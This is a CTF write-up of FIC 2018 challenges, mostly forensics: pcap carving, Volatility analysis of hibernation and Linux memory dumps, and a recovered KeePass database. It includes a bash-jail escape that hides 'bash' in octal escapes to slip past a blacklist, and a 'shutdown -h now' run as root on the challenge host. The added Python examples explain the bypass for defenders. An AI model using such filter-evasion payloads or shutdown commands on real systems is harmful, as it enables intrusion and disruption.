1 Introduction
Several security challenges took place during the FIC 2018 event.
Thanks to all the organizers, authors and sponsors behind these challenges.
Here are several write-ups from the night CTF and the second-day CTF, mostly forensics.
2 Forensic – 50
We get a pcap file: Extract.pcapng.
I fire up Wireshark and, given the name of the file, I run foremost on it too.
------------------------------------------------------------------
File: Extract.pcapng
Start: Tue Jan 23 21:28:18 2018
Length: 1 MB (1900172 bytes)

Num  Name (bs=512)  Size   File Offset  Comment
0:   00003505.png   48 KB  1795007      (736 x 658)
Finish: Tue Jan 23 21:28:19 2018

1 FILES EXTRACTED

png:= 1
------------------------------------------------------------------
The flag is in this PNG file:
So I close Wireshark...
3 bashjail – 100
I didn't solve this one myself, but I love the technique used to display the flag.
It was a bash jail type of challenge.
Here is the output:
$ ssh [email protected] -p 2222
[email protected]'s password:
Essayez de lire le fichier flag.txt :D
Et voici un partie du code dans lequel vous etes :

while :
do
    echo "Votre payload :"
    read input
    if sanitize "$input"
    then
        echo -e '\033[0;31mHop, hop, hop ! Certains caractères sont interdits\033[0m'
    else
        output=$(/bin/sh -c "$input")
    fi
done

Votre payload :
A couple of weeks ago, the CCC Junior CTF proposed a similar challenge:
https://ctftime.org/task/5155
We use the octal representation technique to spawn a bash shell:
Votre payload : $'\\142'$'\\141'$'\\163'$'\\150'
bash-4.4# ls
bash-4.4# id
bash-4.4# pwd
Unfortunately, we don't get the output of our commands back. We were starting to think about sending a reverse shell when one of the team found this quick solution:
bash-4.4# export PS1=$(cat flag.txt)
ENSIBS{b45H_0utPu7_4re_fUn!!}
Pretty efficient, and as a bonus:
ENSIBS{b45H_0utPu7_4re_fUn!!}export PS1=$(whoami)
root
rootshutdown -h now
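To see why the jail's filter misses the payload above, here is an added Python example (not from the write-up or the challenge) that replays what the script does to the input: the read builtin without -r strips one level of backslashes (which is why the payload doubles them), then $'...' ANSI-C quoting turns the octal escapes into characters. It assumes /bin/sh is bash, as the bash-4.4# prompt suggests, and uses a made-up blacklist since the real sanitize function isn't shown; the defender's point is that a filter has to check the decoded command, not the raw text.

```python
import re

# Constructed input: the payload typed at "Votre payload :" in the write-up.
RAW_PAYLOAD = r"$'\\142'$'\\141'$'\\163'$'\\150'"

# Assumed blacklist; the challenge's real sanitize() list is not shown.
BLACKLIST = ("bash", "sh", "cat", "flag")

def emulate_read(line: str) -> str:
    """bash's `read input` (no -r) drops one backslash level: '\\\\'->'\\', '\\1'->'1'."""
    return re.sub(r"\\(.)", r"\1", line)

# One $'...' ANSI-C quoted segment, as bash would parse it.
_ANSI_C = re.compile(r"\$'((?:\\.|[^'\\])*)'")

def _unescape(body: str) -> str:
    """Decode \\NNN octal, \\xHH hex and the common single-char escapes."""
    out, i = [], 0
    while i < len(body):
        c = body[i]
        if c != "\\":
            out.append(c); i += 1; continue
        m = re.match(r"[0-7]{1,3}", body[i + 1:i + 4])
        if m:
            out.append(chr(int(m.group(), 8))); i += 1 + len(m.group()); continue
        m = re.match(r"x([0-9a-fA-F]{1,2})", body[i + 1:i + 4])
        if m:
            out.append(chr(int(m.group(1), 16))); i += 1 + len(m.group()); continue
        nxt = body[i + 1:i + 2]
        out.append({"n": "\n", "t": "\t", "\\": "\\", "'": "'"}.get(nxt, nxt)); i += 2
    return "".join(out)

def canonicalize(payload: str) -> str:
    """Return what /bin/sh actually sees after read + $'...' expansion."""
    after_read = emulate_read(payload)
    return _ANSI_C.sub(lambda m: _unescape(m.group(1)), after_read)

def sanitize(payload: str, decode_first: bool) -> bool:
    """True if the payload is rejected. The naive variant only looks at raw text."""
    text = canonicalize(payload) if decode_first else payload
    return any(word in text for word in BLACKLIST)

if __name__ == "__main__":
    print("raw   :", RAW_PAYLOAD, "-> rejected:", sanitize(RAW_PAYLOAD, False))
    print("decoded:", canonicalize(RAW_PAYLOAD), "-> rejected:", sanitize(RAW_PAYLOAD, True))
```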
4 Forensic – 150
We got a hiberfil.sys for this one, with a comment like "I wrote the password in a file but forgot to save it".
Volatility works directly on a hiberfil, but for performance reasons it's better to convert it first with the imagecopy module:
# vol -f hiberfil.sys --profile=Win7SP0x64 imagecopy -O hiberfil.raw
After that we start looking at it with the classic modules: pstree, filescan, clipboard, etc.
The first hit came from the screenshot module:
# vol -f hiberfil.raw --profile=Win7SP0x64 screenshot
Where we see this:
The user wrote something in Notepad, but the window title shows that it was never saved.
After a few other tests, we found this module, which I had never used before:
# vol --info | grep editbox
Volatility Foundation Volatility Framework 2.6
editbox - Displays information about Edit controls. (Listbox experimental.)

# vol -f hiberfil.raw --profile=Win7SP0x64 editbox
Volatility Foundation Volatility Framework 2.6
******************************
Wnd Context       : 1\WinSta0\Default
Process ID        : 1288
ImageFileName     : notepad.exe
IsWow64           : No
atom_class        : 6.0.7600.16385!Edit
value-of WndExtra : 0x212800
nChars            : 56
selStart          : 56
selEnd            : 56
isPwdControl      : False
undoPos           : 52
undoLen           : 2
address-of undoBuf: 0x219bc0
undoBuf           : Mà
-------------------------
/!\ Password for 192.168.25.18:I_H4te_Hib3rnate_m0de
5 Forensic – 250
We've got a file USB_Partition.img, with a description like "We extracted this USB key from a bad guy, but we encountered space issues during the extraction".
$ file USB_Partition.img
USB_Partition.img: DOS/MBR boot sector, code offset 0x58+2, OEM-ID "mkfs.fat", Media descriptor 0xf8, sectors/track 62, heads 125, hidden sectors 2048, sectors 102400 (volumes > 32 MB) , FAT (32 bit), sectors/FAT 788, serial number 0x8a252437, label: " "
Because of the description, I first run testdisk on it, find a deleted file memo.kdbx, and undelete it.
It's a KeePass password database, and we need a password or key file to open it.
There was a lot of "noise" in this USB extract:
$ mkdir mnt
$ sudo mount USB_Partition.img mnt
$ cd mnt
$ ls -larht
drwxr-xr-x 2 root root 512 Mar 21 2017 Cliches
drwxr-xr-x 2 root root 13K Mar 21 2017 flags
drwxr-xr-x 4 root root 1.0K Mar 21 2017 CrackMapExec-master
drwxr-xr-x 5 root root 2.5K Mar 21 2017 peepdf-master
-rwxr-xr-x 1 root root 5.9M Mar 21 2017 Guide_securite_industrielle_Version_finale.pdf
-rwxr-xr-x 1 root root 264K Mar 21 2017 ANSSI-CSPN-CER-I-02_Criteres_pour_evaluation_en_vue_d_une_CSPN_v1-1.pdf
-rwxr-xr-x 1 root root 1.4M Mar 21 2017 anssi-cspn-2016_10.pdf
-rwxr-xr-x 1 root root 760K Mar 22 2017 Template_Document.docx
_ The directory "flags" contains a lot of country flag pictures
_ The peepdf tool sources are in it too, and the pdfextract tool highlights that one PDF looks weird
_ There is also another tool named CrackMapExec, but I didn't look deeper into it
However, I suspect the file Template_Document.docx is interesting because of its modification date/time. Indeed, all files have the same timestamp except this one:
For all files:
Modify: 2017-03-21 23:28:12.000000000 +0100
Change: 2017-03-21 23:28:12.000000000 +0100
For Template_Document.docx:
Modify: 2017-03-22 00:02:28.000000000 +0100
Change: 2017-03-22 00:03:49.000000000 +0100
It seems the author modified this file last, to make it fit with the rest of the challenge or something... maybe to put a password in it?
After unzipping the docx, a file named "help.png" appears in the 'word' folder instead of 'media'. It was a QR code.
# zbarimg help.png
QR-Code:GipsyDangerRektsYou
scanned 1 barcode symbols from 1 images in 0.02 seconds
It's also the password for the KeePass database recovered at the beginning.
6 Forensic – ???
I don't know how many points this one was worth.
This challenge took place during the second day of the FIC event.
We've got a PNG file, with the simple description "All is in RAM".
# file Acissi_2k18.png
Acissi_2k18.png: PNG image data, 340 x 50, 8-bit/color RGBA, non-interlaced

# du -h Acissi_2k18.png
303M Acissi_2k18.png

# binwalk Acissi_2k18.png

DECIMAL       HEXADECIMAL     DESCRIPTION
0             0x0             PNG image, 340 x 50, 8-bit/color RGBA, non-interlaced
152           0x98            Zlib compressed data, best compression, uncompressed size >= 68121
21710         0x54CE          Zip archive data, at least v2.0 to extract, compressed size: 316783029, uncompressed size: 1090610472, name: "locky.raw"
316804833     0x12E20EE1      End of Zip archive
OK, there is a zip file appended after the PNG.
# dd if=Acissi_2k18.png of=locky.zip bs=21710 skip=1
14591+1 records in
14591+1 records out
316783145 bytes (317 MB) copied, 5.90328 s, 53.7 MB/s

# 7z x locky.zip

7-Zip [64] 9.20  Copyright © 1999-2010 Igor Pavlov  2010-11-18
p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,2 CPUs)

Processing archive: locky.zip

Extracting  locky.raw

Everything is Ok

Size:       1090610472
Compressed: 316783145

# file locky.raw
locky.raw: ELF 64-bit LSB core file x86-64, version 1 (SYSV)

# strings locky.raw | grep BOOT_IMAGE
a07e8 file=/cdrom/preseed/custom.seed boot=casper initrd=/casper/initrd.gz quiet splash -- BOOT_IMAGE=/casper/vmlinuz
1ec3a98 Command line: file=/cdrom/preseed/custom.seed boot=casper initrd=/casper/initrd.gz quiet splash -- BOOT_IMAGE=/casper/vmlinuz
...
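An added example, not part of the write-up: a small Python PNG chunk walker that finds where the image really ends (just after the IEND chunk, with each chunk CRC verified) and reports what follows it, which is the check binwalk did above. The sample input is a constructed 1x1 PNG with a fake zip local-file header appended; on the challenge file the returned offset can be compared with the 21710 that binwalk reported.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
ZIP_LOCAL_HDR = b"PK\x03\x04"

def png_end_offset(data: bytes) -> int:
    """Walk the chunk list and return the offset just past IEND's CRC."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])[0]
        if zlib.crc32(ctype + body) & 0xffffffff != crc:
            raise ValueError("bad CRC in %r chunk at offset %d" % (ctype, pos))
        pos += 12 + length
        if ctype == b"IEND":
            return pos
    raise ValueError("no IEND chunk")

def carve_trailer(data: bytes):
    """Return (end_of_png, kind, trailing_bytes); kind is 'zip' for a PK header."""
    end = png_end_offset(data)
    trailer = data[end:]
    kind = "zip" if trailer.startswith(ZIP_LOCAL_HDR) else ("none" if not trailer else "unknown")
    return end, kind, trailer

def zip_entry_name(trailer: bytes) -> str:
    """Read the first entry's file name from a zip local-file header."""
    fnlen, _extralen = struct.unpack("<HH", trailer[26:30])
    return trailer[30:30 + fnlen].decode()

def _chunk(ctype: bytes, body: bytes) -> bytes:
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body) & 0xffffffff)

def build_sample() -> bytes:
    """Constructed 1x1 RGBA PNG followed by a fake 'locky.raw' zip local header."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 6, 0, 0, 0)
    idat = zlib.compress(b"\x00" + b"\x00\x00\x00\xff")  # one filter byte + one RGBA pixel
    png = PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")
    name = b"locky.raw"
    local_hdr = ZIP_LOCAL_HDR + struct.pack("<HHHHHIIIHH", 20, 0, 0, 0, 0, 0, 0, 0, len(name), 0)
    return png + local_hdr + name

if __name__ == "__main__":
    end, kind, trailer = carve_trailer(build_sample())
    print("PNG ends at", end, "- trailer:", kind, zip_entry_name(trailer) if kind == "zip" else "")
```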
It appears to be a Linux memory dump, and after googling '/casper/vmlinuz', it seems to be a live ISO boot of an Ubuntu distribution.
After a few tests with another team member, he eventually found that the right profile is available on the GitHub page of the Volatility profiles project:
https://github.com/volatilityfoundation/profiles/blob/master/Linux/Ubuntu/x64/Ubuntu1404.zip
# vol.py -f locky.raw --profile=Linuxubuntu14x64 linux_banner
Volatility Foundation Volatility Framework 2.6
Linux version 3.16.0-28-generic (buildd@batsu) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #38-Ubuntu SMP Sat Dec 13 16:13:28 UTC 2014 (Ubuntu 3.16.0-28.38~14.04.1-generic 3.16.7-ckt1)
Works fine, let's play.
There is a lot of "noise" in this dump, the bash history for example:
# vol.py -f locky.raw --profile=Linuxubuntu14x64 linux_bash | wc -l
Volatility Foundation Volatility Framework 2.6
322
But in the end we find something suspicious:
...
3660 bash 2017-01-12 08:58:01 UTC+0000 ./init_
3660 bash 2017-01-12 08:58:05 UTC+0000 sudo ./init_
3660 bash 2017-01-12 08:58:26 UTC+0000 sudo su
3660 bash 2017-01-12 08:58:55 UTC+0000 sudo chmod 777 init_
3660 bash 2017-01-12 08:58:58 UTC+0000 ./init_

# vol.py -f locky.raw --profile=Linuxubuntu14x64 linux_getcwd | grep init_
Volatility Foundation Volatility Framework 2.6
init_ 3704 /home/cyborg/Downloads
Let’s try to recover this file:
# vol.py -f locky.raw --profile=Linuxubuntu14x64 linux_find_file -f /home/cyborg/Downloads/init_ -D .
Volatility Foundation Volatility Framework 2.6
ERROR : volatility.debug : The requested file doesn't exist
That fails, but dumping the process itself from memory works better.
# vol.py -f locky.raw --profile=Linuxubuntu14x64 linux_pstree
[...]
....gnome-terminal 3651 1000
.....gnome-pty-helpe 3659 1000
.....bash 3660 1000
......init_ 3704 1000
[...]

# vol.py -f locky.raw --profile=Linuxubuntu14x64 linux_procdump -D . -p 3704
Volatility Foundation Volatility Framework 2.6
Offset             Name                 Pid             Address            Output File
------------------ -------------------- --------------- ------------------ -----------
0xffff880005783d20 init_                3704            0x0000000008048000 ./init_.3704.0x8048000

# file init_.3704.0x8048000
init_.3704.0x8048000: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, stripped
After a quick look at it, we find this string being built on the stack:
| 0x0804848e c7442408000. mov dword [esp+0x8], 0x0
| 0x08048496 c7442404000. mov dword [esp+0x4], 0x0
| 0x0804849e c744240f2a4. mov dword [esp+0xf], 0x616c462a
| 0x080484a6 c74424135f6. mov dword [esp+0x13], 0x633d675f
| 0x080484ae c7442417644. mov dword [esp+0x17], 0x24314064
| 0x080484b6 c744241b695. mov dword [esp+0x1b], 0x35725f69
| 0x080484be c744241f5e6. mov dword [esp+0x1f], 0x6735685e
| 0x080484c6 c7442423646. mov dword [esp+0x23], 0x6e766d64
| 0x080484ce c7442427363. mov dword [esp+0x27], 0x2a353a36
| 0x080484d6 c644242b00 mov byte [esp+0x2b], 0x0
This stands for: *Fla_g=cd@1$i_r5^h5gdmvn6:5*
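Converting those immediates by hand is easy to get wrong (byte order, offset order), so here is an added Python example, not from the write-up, that replays the mov immediates into a byte buffer in little-endian order and pulls out the printable, NUL-terminated run; the listing is the one shown above, copied in as constructed input.

```python
import re

# Constructed input: the radare2 listing from the write-up, pasted as text.
DISASM = """
| 0x0804848e c7442408000. mov dword [esp+0x8], 0x0
| 0x08048496 c7442404000. mov dword [esp+0x4], 0x0
| 0x0804849e c744240f2a4. mov dword [esp+0xf], 0x616c462a
| 0x080484a6 c74424135f6. mov dword [esp+0x13], 0x633d675f
| 0x080484ae c7442417644. mov dword [esp+0x17], 0x24314064
| 0x080484b6 c744241b695. mov dword [esp+0x1b], 0x35725f69
| 0x080484be c744241f5e6. mov dword [esp+0x1f], 0x6735685e
| 0x080484c6 c7442423646. mov dword [esp+0x23], 0x6e766d64
| 0x080484ce c7442427363. mov dword [esp+0x27], 0x2a353a36
| 0x080484d6 c644242b00 mov byte [esp+0x2b], 0x0
"""

# Matches `mov dword|byte [esp+0xOFF], 0xIMM` as radare2 prints it.
MOV_IMM = re.compile(r"mov (dword|byte) \[esp\+0x([0-9a-f]+)\], 0x([0-9a-f]+)")
SIZES = {"dword": 4, "byte": 1}

def stack_image(listing: str) -> bytearray:
    """Replay each store into a buffer indexed by its esp offset (x86 is little-endian)."""
    buf = bytearray()
    for size, off, imm in MOV_IMM.findall(listing):
        off, width = int(off, 16), SIZES[size]
        raw = int(imm, 16).to_bytes(width, "little")
        if len(buf) < off + width:
            buf.extend(b"\x00" * (off + width - len(buf)))
        buf[off:off + width] = raw
    return buf

def stack_strings(listing: str, min_len: int = 4):
    """Extract printable ASCII runs from the replayed stack buffer."""
    buf = bytes(stack_image(listing))
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, buf)]

if __name__ == "__main__":
    for s in stack_strings(DISASM):
        print(s)
```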
But cd@1$i_r5^h5gdmvn6:5 doesn't validate the challenge!
Nothing in the description mentions a flag format.
I spent an hour on it.
The binary isn't very complicated, but doesn't appear to do anything with this string. I thought I had missed something in the dump, but found nothing relevant...
Eventually I submitted the complete string, with the "*" and "Fla_g=", and that was it.
GG me for losing one hour of a 3:30-hour-long CTF.
Article Link: https://www.cert-devoteam.fr/publications/en/fic-2018-random-forensics-challenges-write-up/